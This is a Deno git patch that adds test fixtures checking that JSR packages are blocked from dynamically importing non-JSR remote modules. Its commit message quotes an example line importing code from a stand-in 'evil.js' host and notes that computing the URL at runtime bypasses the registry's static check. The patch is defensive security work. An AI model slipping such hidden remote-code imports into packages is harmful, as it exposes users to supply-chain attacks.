From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001 From: David Sherret Date: Wed, 28 Feb 2024 16:30:45 -0500 Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623) A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this. --- tests/testdata/jsr/import_https_url/analyzable.out | 8 ++++++++ tests/testdata/jsr/import_https_url/analyzable.ts | 1 + tests/testdata/jsr/import_https_url/unanalyzable.out | 7 +++++++ tests/testdata/jsr/import_https_url/unanalyzable.ts | 1 + 4 files changed, 17 insertions(+) create mode 100644 tests/testdata/jsr/import_https_url/analyzable.out create mode 100644 tests/testdata/jsr/import_https_url/analyzable.ts create mode 100644 tests/testdata/jsr/import_https_url/unanalyzable.out create mode 100644 tests/testdata/jsr/import_https_url/unanalyzable.ts (limited to 'tests/testdata/jsr/import_https_url') diff --git a/tests/testdata/jsr/import_https_url/analyzable.out b/tests/testdata/jsr/import_https_url/analyzable.out new file mode 100644 index 000000000..dd1ca58b4 --- /dev/null +++ b/tests/testdata/jsr/import_https_url/analyzable.out @@ -0,0 +1,8 @@ +Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json +Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json +Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts +Download http://localhost:4545/welcome.ts +error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons. +await import("http://localhost:4545/welcome.ts"); +^ + at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts:1:1 diff --git a/tests/testdata/jsr/import_https_url/analyzable.ts b/tests/testdata/jsr/import_https_url/analyzable.ts new file mode 100644 index 000000000..44382867f --- /dev/null +++ b/tests/testdata/jsr/import_https_url/analyzable.ts @@ -0,0 +1 @@ +import "jsr:@denotest/import-https-url/analyzable"; diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.out b/tests/testdata/jsr/import_https_url/unanalyzable.out new file mode 100644 index 000000000..4ae04996c --- /dev/null +++ b/tests/testdata/jsr/import_https_url/unanalyzable.out @@ -0,0 +1,7 @@ +Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json +Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json +Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts +error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons. +await import(nonAnalyzableUrl()); +^ + at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts:5:1 diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.ts b/tests/testdata/jsr/import_https_url/unanalyzable.ts new file mode 100644 index 000000000..87ccdcfdc --- /dev/null +++ b/tests/testdata/jsr/import_https_url/unanalyzable.ts @@ -0,0 +1 @@ +import "jsr:@denotest/import-https-url/unanalyzable"; -- cgit v1.2.3